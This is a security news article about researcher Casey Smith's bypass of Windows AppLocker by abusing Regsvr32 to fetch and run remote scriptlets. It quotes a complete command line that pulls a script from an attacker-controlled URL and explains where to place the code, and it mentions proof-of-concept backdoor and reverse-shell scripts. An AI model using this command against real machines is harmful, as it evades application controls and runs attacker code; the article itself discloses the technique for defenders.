Security Experts:

Connect with us

Hi, what are you looking for?



Windows AppLocker Bypassed to Execute Remote Scripts

Microsoft’s Windows AppLocker, a feature introduced in Windows 7 to specify which users can run apps within an organization, can be bypassed to execute remote scripts on a machine, a researcher says.

Microsoft’s Windows AppLocker, a feature introduced in Windows 7 to specify which users can run apps within an organization, can be bypassed to execute remote scripts on a machine, a researcher says.

When AppLocker was introduced in Windows 7 and Windows Server 2008 R2, Microsoft provided administrators with the ability to set rules to allow or deny applications from running. These rules could be enforced for specific users or groups and could be used for executable files (.exe and .com), scripts (.js, .ps1, .vbs, .cmd, and .bat), Windows Installer files (.msi and .msp), and DLL files (.dll and .ocx).

In order to successfully bypass Windows AppLocker, an attacker needs to already have a foothold on the target machine, and also has to abuse Regsvr32, a command-line utility designed for registering DLLs in the registry, security researcher Casey Smith explains.

The researcher was looking for a way to register a script to bypass AppLocker, and discovered that the best way to do so is to place the script block inside of the Registration tag and then to call Regsvr32 to have the code executed. Moreover, Smith discovered that the code in the registration element executes on register and unregister.

Abusing Regsvr32 to execute the script comes with a series of benefits, as the command-line tool is proxy aware, uses TLS, follows redirects, and can also be set to run silently and to not display any message boxes.

“So, all you need to do is host your .sct file at a location you control. From the target, simply execute regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll. It’s not well documented that Regsvr32 can accept a URL for a script. In order to trigger this bypass, place the code block, either VB or JS inside the <registration> element,” the researcher explains.

Smith also said that the bypass can be used to call a local file, and that executing the script from the registration element doesn’t actually register the COM object, meaning that nothing will appear in registry. The researcher created a set of proof-of-concept scripts that can be loaded via Regsvr32 to open a backdoor or a reverse shell over HTTP.

Present even in Windows 10, the latest operating system version from Microsoft, AppLocker is considered as one of the most important security features in the platform. In February, when revealing Enhanced Mitigation Experience Toolkit (EMET) 5.5, Microsoft said that, next to Device Guard, and CFG, AppLocker is one of the Windows 10 features that provides equivalent (or better) mitigations than EMET.

This is not the first time the Regsvr32 component is found to provide intruders with the possibility to perform nefarious operations on target computers. In 2014, the Neverquest banking Trojanwas also abusing it to execute its DLL module.

Written By

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join this webinar to learn best practices that organizations can use to improve both their resilience to new threats and their response times to incidents.


Join this live webinar as we explore the potential security threats that can arise when third parties are granted access to a sensitive data or systems.


Expert Insights

Related Content


Less than a week after announcing that it would suspended service indefinitely due to a conflict with an (at the time) unnamed security researcher...

Risk Management

The supply chain threat is directly linked to attack surface management, but the supply chain must be known and understood before it can be...


Apple has released updates for macOS, iOS and Safari and they all include a WebKit patch for a zero-day vulnerability tracked as CVE-2023-23529.

Application Security

Drupal released updates that resolve four vulnerabilities in Drupal core and three plugins.

Cloud Security

VMware vRealize Log Insight vulnerability allows an unauthenticated attacker to take full control of a target system.

Application Security

A CSRF vulnerability in the source control management (SCM) service Kudu could be exploited to achieve remote code execution in multiple Azure services.

IoT Security

Lexmark warns of a remote code execution (RCE) vulnerability impacting over 120 printer models, for which PoC code has been published.


GoAnywhere MFT users warned about a zero-day remote code injection exploit that can be targeted directly from the internet